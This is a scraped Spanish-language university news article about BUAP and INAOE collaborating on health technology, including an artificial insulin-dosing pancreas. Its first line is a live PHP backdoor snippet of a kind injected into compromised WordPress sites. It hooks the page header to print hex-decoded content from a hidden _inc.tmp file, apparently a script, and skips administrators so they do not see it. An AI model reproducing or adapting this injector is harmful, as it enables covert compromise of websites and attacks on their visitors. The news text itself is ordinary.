if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } BUAP e INAOE desarrollan proyectos de salud – La Opinión Universitaria La Opinión Universitaria
Menu

BUAP e INAOE desarrollan proyectos de salud

La Benemérita Universidad Autónoma de Puebla  (BUAP) y el Instituto Nacional de Astrofísica, Óptica y Electrónica (INAOE) trabajan conjuntamente en la creación de distintos proyectos enfocados en resolver distintas problemáticas relacionadas con la salud.

Así lo dio a conocer Eduardo Tepichín Rodríguez, investigador del INAOE quien dijo en entrevista  tras la inauguración del XVII Congreso Nacional de Tecnología Aplicada a Ciencias de la Salud que están trabajando en torno a la generación de nuevas técnicas de diagnóstico y tratamiento de diferentes enfermedades.

“Los investigadores de nuestro Instituto han comenzado a desarrollar aplicaciones tecnológicas para las ciencias de la salud, y aquí es donde perfectamente podemos incidir en la solución de problemas nacionales, un tema especial es el análisis del ojo humano y en especial del ojo de los mexicanos para hacer tecnología a la medida de las necesidades del país”, señaló.

En este sentido, agregó que científicos colaboran con la BUAP en el desarrollo de proyectos para atender problemas relacionados con la vista, el páncreas y otras partes del cuento.

Tepichín Rodríguez señaló que la creación de un páncreas artificial es el proyecto más importante, ”consiste en la creación de una máquina que pueda medir la dosis exacta de insulina que se tiene que aplicar a los pacientes que padecen diabetes, no obstante, descartó que se ocupe para trasplantes”.

Explicó que el páncreas artificial nos permitiría tener una dosis exacta de insulina en función de su necesidad en vez de estar sub o sobre medicado, el proyecto en desarrollo estaría llevándose a laboratorios, clínicas y hospitales del Instituto Mexicano del Seguro Social (IMSS).

Indicó que hay convenio con algunos laboratorios y hospitales porque lo que nos hace falta es la retroalimentación, sino tenemos datos clínicos se muere nuestro proyecto.

 

No comments

Deja una respuesta

Tweets recientes